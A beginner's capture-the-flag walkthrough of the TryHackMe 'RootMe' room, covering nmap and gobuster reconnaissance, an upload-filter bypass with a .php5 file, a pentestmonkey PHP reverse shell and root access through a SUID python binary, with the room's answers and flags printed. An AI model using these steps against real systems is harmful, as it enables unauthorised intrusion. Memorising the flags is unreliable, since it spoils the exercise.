A ctf for beginners, can you root me?
THM Room https://tryhackme.com/room/rrootme
TASK 1 : Deploy the machine
Deploy the machine
No Answer
TASK 2 : Reconnaissance
Scan the machine, how many ports are open?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
root@ip-10-10-247-193:~# nmap -vv -sC 10.10.76.243
Starting Nmap 7.60 ( https://nmap.org ) at 2022-02-27 10:23 GMT
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:23
Completed NSE at 10:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:23
Completed NSE at 10:23, 0.00s elapsed
Initiating ARP Ping Scan at 10:23
Scanning 10.10.76.243 [1 port]
Completed ARP Ping Scan at 10:23, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:23
Completed Parallel DNS resolution of 1 host. at 10:23, 0.00s elapsed
Initiating SYN Stealth Scan at 10:23
Scanning ip-10-10-76-243.eu-west-1.compute.internal (10.10.76.243) [1000 ports]
Discovered open port 80/tcp on 10.10.76.243
Discovered open port 22/tcp on 10.10.76.243
Completed SYN Stealth Scan at 10:23, 1.26s elapsed (1000 total ports)
NSE: Script scanning 10.10.76.243.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:23
Completed NSE at 10:23, 0.22s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:23
Completed NSE at 10:23, 0.00s elapsed
Nmap scan report for ip-10-10-76-243.eu-west-1.compute.internal (10.10.76.243)
Host is up, received arp-response (0.0013s latency).
Scanned at 2022-02-27 10:23:11 GMT for 2s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
| 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC4fnU3h1O9PseKBbB/6m5x8Bo3cwSPmnfmcWQAVN93J
80/tcp open http syn-ack ttl 64
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home
MAC Address: 02:F2:1A:FF:F4:BB (Unknown)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:23
Completed NSE at 10:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:23
Completed NSE at 10:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.47 seconds
Raw packets sent: 1002 (44.072KB) | Rcvd: 1002 (40.076KB)
Answer : 2
What version of Apache is running?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@ip-10-10-247-193:~# nmap -sV --script http-apache-server-status 10.10.76.243
Starting Nmap 7.60 ( https://nmap.org ) at 2022-02-27 10:24 GMT
Nmap scan report for ip-10-10-76-243.eu-west-1.compute.internal (10.10.76.243)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 02:F2:1A:FF:F4:BB (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.01 seconds
Answer : 2.4.29
What service is running on port 22?
Answer : ssh
Find directories on the web server using the GoBuster tool.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@ip-10-10-247-193:~# gobuster dir -u http://10.10.76.243 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.76.243
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2022/02/27 10:27:29 Starting gobuster
===============================================================
/index.php (Status: 200)
/uploads (Status: 301)
/css (Status: 301)
/js (Status: 301)
/panel (Status: 301)
/server-status (Status: 403)
===============================================================
2022/02/27 10:29:17 Finished
===============================================================
No Answer.
What is the hidden directory?
Checked out the directories found by gobuster, /panel/ gives me a webpage uploader :
And /uploads seems to be the directory where uploads goes :
Answer : /panel/
TASK 3 : Getting a shell
Find a form to upload and get a reverse shell, and find the flag.
As I noted, /panel is a form to uploads on the server and the uploads are stored in the /uploads directory which is accessible. So I tried to uploads some files with different extensions and they were uploaded :
But PHP file are not permitted :
I then tried PHP filter evasion with .png extension and upload a PHP echo print. This doesn’t work.
I tried to uploads a .php5 file for echo(‘helo’) and it works :
One more step needed to get a shell, uploads a .php5 file which can allows me to get a reverse shell. After few simples attempts, I choose a php reverse shell i already worked with, from pentestmonkey https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php:
II change the IP and the Port to be mine an i got a shell.
After looking some directories (/home/rootme, /etc, /var/www) i found the user.txt file in /var/www directory.
1
2
3
4
5
6
$ cd /var/www
$ ls
html
user.txt
$ cat user.txt
THM{y0u_g0t_a_sh3ll}
Answer : THM{y0u_g0t_a_sh3ll}
TASK 4 : Privilege escalation
Search for files with SUID permission, which file is weird?
Looking for SUIDs permissions :
1
find / -user root -perm -4000 -print 2>/dev/null
Python seems good to check on GFTOBINS :
Answer : /usr/bin/python
Find a form to escalate your privileges.
Executed the gftobins command :
1
2
3
4
$ cd /usr/bin
$ ./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
No Answer.
root.txt
1
2
cat /root/root.txt
THM{pr1v1l3g3_3sc4l4t10n}
Answer : THM{pr1v1l3g3_3sc4l4t10n}